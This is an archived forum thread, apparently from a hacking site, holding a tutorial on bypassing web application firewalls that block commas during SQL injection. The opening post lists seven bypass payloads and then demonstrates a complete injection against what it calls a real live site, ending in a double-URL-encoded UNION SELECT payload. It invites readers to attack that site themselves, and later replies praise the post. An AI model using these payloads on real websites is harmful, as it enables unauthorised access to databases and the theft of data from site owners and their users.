<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3116000" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3116000" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3116000</a>. It is a snapshot of the page as it appeared on 2 Apr 2014 20:02:37 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3116000" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:zO0jjdBbgi4J:www.hackforums.net/showthread.php%3Ftid%3D3116000&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] SQLi - when commas are blocked - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] SQLi - when commas are blocked"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3116000"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-02-2014, 12:02 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/logo_bl.gif" alt="" title="Hack Forums ... Shift+R improves the quality of this image. Shift+A improves the quality of all images on this page."></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] SQLi - when commas are blocked</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (5):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=4" class="pagination_page">4</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=5" class="pagination_page">5</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3116000" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/rating.js"></script><div id="success_rating_3116000" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3116000"><li style="width: 100%" class="current_rating" id="current_rating_3116000">1 Votes - 5 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3116000&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3116000&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3116000&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3116000&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3116000&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3116000" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3116000_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3116000" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3116000&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3116000");
// -->
</script><div><strong>[Tutorial] SQLi - when commas are blocked</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid29066553" id="pid29066553"></a><table class="tborder" style="border-top-width: 0; " id="post_29066553" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-22-2012, 03:57 PM <span id="edited_by_29066553"><span class="smalltext">(This post was last modified: 03-15-2014 09:29 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29066553#pid29066553">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,190<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29066553">Hi folks,<br><br>last
 time we made an exercise tutorial for situation when white spaces are 
blocked by WAF (Web application Firewall). Read/try it here: <a href="http://www.hackforums.net/showthread.php?tid=2884351" target="_blank">http://www.hackforums.net/showthread.php?tid=2884351</a><br><br>This
 time we will talk about situation when commas are blocked. I will try 
to explain it in real situation (I found a site here on HF). <span style="color: #FF4500;">Credits go to Syed.</span><br><br>From different tutorials we know different strategies for this situation can be used:<br><br><span style="color: #FFD700;"><span style="font-weight: bold;">#1</span></span><br>we can put <span style="font-weight: bold;"><span style="color: #32CD32;">,</span></span> in comment like<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1/*!,*/ 2/*!,*/ 3</code></div></div><br>or<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1/*,*/ 2/*,*/ 3</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">#2</span></span><br>we can use <span style="color: #00BFFF;">CHAR(44)</span> - ascii value of comma. After regular commas are strip out by WAF those as CHAR may remains.<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1,CHAR(44), 2,CHAR(44), 3</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">#3</span></span><br>we can use command <span style="color: #00BFFF;">join</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select 1)a join (select 2)b join (select 3)c</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">#4</span></span><br>Escaped-encoding/URL
 encoding (or sometimes referred to as percent-encoding) is a method of 
representing characters within an URI that may need special syntax 
handling to be correctly interpreted. This is achieved by encoding the 
character to be interpreted with a sequence of three characters. It 
consists of the percentage character <span style="color: #FFD700;">%</span>
 followed by the two hexadecimal digits representing the octet code of 
the original character. For example, the US-ASCII character set 
represents a comma with octet code 44, or hexadecimal <span style="color: #FFD700;">2C</span>. Thus its URL-encoded representation is <span style="color: #FFD700;">%2C</span>.<br><br>So we can replace <span style="font-weight: bold;"><span style="color: #32CD32;">,</span></span> with its <span style="color: #00BFFF;">URL encoded value</span> %2C.<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1%2C 2%2C 3</code></div></div><br>Sometimes we must split <span style="color: #00BFFF;">%</span> from hex value <span style="color: #00BFFF;">2C</span> like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1% 2C 2% 2C 3</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">#5</span></span><br>we can replace <span style="font-weight: bold;"><span style="color: #32CD32;">,</span></span> with <span style="color: #00BFFF;">%82</span> (&amp;sbquo HTML character entity)<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1%82 2%82 3</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">#6</span></span><br>Sometimes
 this basic URL-encoding attack might not work, however you can 
circumvent the WAF by double URL-encoding the blocked character(s). In 
the double-encoded attack the <span style="color: #FFD700;">%</span> character in the original command is itself URL-encoded in the normal way (as <span style="color: #FFD700;">%25</span>) so that the <span style="color: #00BFFF;">double-URL-encoded</span> value of comma (%2C) is <span style="color: #FFD700;">%252C</span>.<br><br>So we can replace <span style="font-weight: bold;"><span style="color: #32CD32;">,</span></span> with <span style="color: #00BFFF;">double URLencoded value</span> %252C<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1%252C 2%252C 3</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">#7</span></span><br>if comma in function is allowed we can use function <span style="color: #00BFFF;">concat()</span>. After regular commas are strip out by WAF those as CHAR(44) may remain.<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>CONCAT(1,CHAR(44), CONCAT(2,CHAR(44), 3</code></div></div><br><span style="font-size: large;"><span style="color: #32CD32;">Now a real case example:</span></span><br><br>We have this site:<br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.vulnerable_site.com/vulnerable_site-Je-suis-prete,884.html</code></div></div></div></div><br><span style="color: #FFA500;">Those of you, you want to try it by yourself take the URL, skip this reading to the end and go coding your SQLi</span> :) It will be a nice exercise.<br><br><span style="color: #00BFFF;">All others let's start with our SQLi explanation.</span><br><br>After adding ' we get error (site is SQL vulnerable).<br><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/4555e83ca3d2e18e6f6e7c5ddc0c9cbb.jpg" alt="[Image: 4555e83ca3d2e18e6f6e7c5ddc0c9cbb.jpg]" border="0"><br><br>As we learned in tutorial <span style="color: #FFA500;">Learning from error response</span> <a href="http://www.hackforums.net/showthread.php?tid=2853082" target="_blank">http://www.hackforums.net/showthread.php?tid=2853082</a> we must analyse error response and react based on info we can use. And in this case we can use table name <span style="font-weight: bold;"><span style="color: #32CD32;">Produit</span></span> to get columns count. We use command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.vulnerable_site.com/vulnerable_site-Je-suis-prete,884' and (select * from Produit)=(select 1)-- -.html</code></div></div><br>and we get<br><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/4b144aef6874e97308a29dc556f058dc.jpg" alt="[Image: 4b144aef6874e97308a29dc556f058dc.jpg]" border="0"><br><br>OK, so we know there are <span style="color: #32CD32;">26 columns</span>. Lets try with <span style="color: #00BFFF;">union select</span> command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.vulnerable_site.com/vulnerable_site-Je-suis-prete,884' and 0<br>UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br>.html</code></div></div><br>What we get? <span style="color: #FF0000;">Nothing :(</span> Site loads normally... We didn't inject successfully.<br><br>Lets analyze previous error response again. There is a character ' at the end (before LIMIT 1). Let's modify our command to:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.vulnerable_site.com/vulnerable_site-Je-suis-prete,884' and 0<br>UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 and 'a' ='a<br>.html</code></div></div><br>and we get new error response<br><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/671025f69dc84b3dbecdc5ab135f3f37.jpg" alt="[Image: 671025f69dc84b3dbecdc5ab135f3f37.jpg]" border="0"><br><br>Let's analyze new error response. Who put <span style="color: #FFD700;">ID_produit</span> to<span style="color: #FFD700;"> 26</span> if in original link this parameter is <span style="color: #FFD700;">884</span>??? SQL command in previous error response was<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT * FROM Produit WHERE ID_Produit=884</code></div></div><br>and in last error response after our <span style="color: #00BFFF;">union select</span> injection with <span style="color: #32CD32;">26 columns</span> is:<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT * FROM Produit WHERE ID_Produit=26</code></div></div><br>Aha, site takes parameter after <span style="font-weight: bold;"><span style="color: #FFA500;">last</span></span> comma value. Let try with non-existent column 27 if this is true...<br><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/5da3f69a171d1fb52a3b94512c22d819.jpg" alt="[Image: 5da3f69a171d1fb52a3b94512c22d819.jpg]" border="0"><br><br>Yep, it is true. We can see SQL comand<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT * FROM Produit WHERE ID_Produit=27</code></div></div><br>What that means? It means we can't use commas in our <span style="color: #00BFFF;">union select</span>
 command because site ignores all commas but the last one it finds (so 
we can't say commas are blocked (as in title of this tutorial) but still
 we can't use them).<br><br>Let's try to bypass this. For start we will play only with original parameter <span style="color: #FFD700;">884</span> as this is less work to do as if we use all 26 columns in our <span style="color: #00BFFF;">union select</span> command changing 25 commas. Let's put comma inside of <span style="color: #FFD700;">884</span> value like <span style="color: #FFD700;">8,84</span>:<br><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/5d1dcba3af348625678f653397bb2d10.jpg" alt="[Image: 5d1dcba3af348625678f653397bb2d10.jpg]" border="0"><br><br>As we expected all commas but last one are ignored and parameter was changed from <span style="color: #FFD700;">884</span> to <span style="color: #FFD700;">84</span> as 84 is a value after last comma. We can see SQL:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>SELECT * FROM Produit WHERE ID_Produit=84</code></div></div><br>Now we have to go trough different strategies to find out how to bypass situation and preserve all commas we need in our <span style="color: #00BFFF;">union select</span> command. After some trying you will find out double URL-encode strategy works. So instead of comma in <span style="color: #FFD700;">8,84</span> we added <span style="color: #32CD32;">%252C</span> to our command and we get:<br><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/76be1414d72ffb03b7db56b34d6bbd45.jpg" alt="[Image: 76be1414d72ffb03b7db56b34d6bbd45.jpg]" border="0"><br><br><span style="font-weight: bold;"><span style="font-size: large;"><span style="color: #32CD32;">Bingo. </span></span></span>Whole number <span style="color: #FFD700;">884</span> with our comma inside remains. Now we know we should replace all commas in our <span style="color: #00BFFF;">union select</span> command with <span style="color: #32CD32;">%252C</span>. And the final command will be (click on link bellow to see solution) or try to make a command by yourself for exercise...<br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.vulnerable_site.com/vulnerable_site-Je-suis-prete,884'
 and 0 union select 
1%252C2%252C3%252C4%252C5%252C6%252C7%252C8%252C9%252C10%252C11%252C12%252C13%25
​
2C14%252C15%252C16%252C17%252C18%252C19%252C20%252C21%252C22%252C23%252C24%252C2
​5%252C26-- -.html</code></div></div></div></div><br>Vulnerable columns are 7 and 8. <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>Isn't SQLi interesting and challenging? :)</div><div class="post_meta" id="post_meta_29066553"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29066553" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29067650" id="pid29067650"></a><table class="tborder" style="margin-top: 5px; " id="post_29067650" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-22-2012, 04:15 PM <span id="edited_by_29067650"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29067650#pid29067650">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=670820"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/ff7e810a872c487d7c0125c187f9271a.jpg" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=670820"><span class="group29">CrႣwn</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">{ crown ~ } $ echo French Member<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 69<br>Posts: 617<br>Joined: Feb 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=670820"><strong class="reputation_positive">110</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29067650">Very nice tutorial i already knew some points but most of them were unknown to me.</div><div class="post_meta" id="post_meta_29067650"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=670820" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29067650" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29067860" id="pid29067860"></a><table class="tborder" style="margin-top: 5px; " id="post_29067860" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-22-2012, 04:24 PM <span id="edited_by_29067860"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29067860#pid29067860">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1181919"><span class="group29">LevelUp</span></a></span></strong> <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1181919" title="Away"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_away.gif" alt="Away" border="0"></a><br><span class="smalltext">ask12b1<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 333<br>Posts: 3,360<br>Joined: Feb 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1181919"><strong class="reputation_positive">507</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/symbol-dollar_24.png" alt="Rich Bitch" title="Rich Bitch"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/labrador.png" alt="Dog Lover" title="Dog Lover"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/donator.png" alt="Emerald Donator" title="Emerald Donator"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img 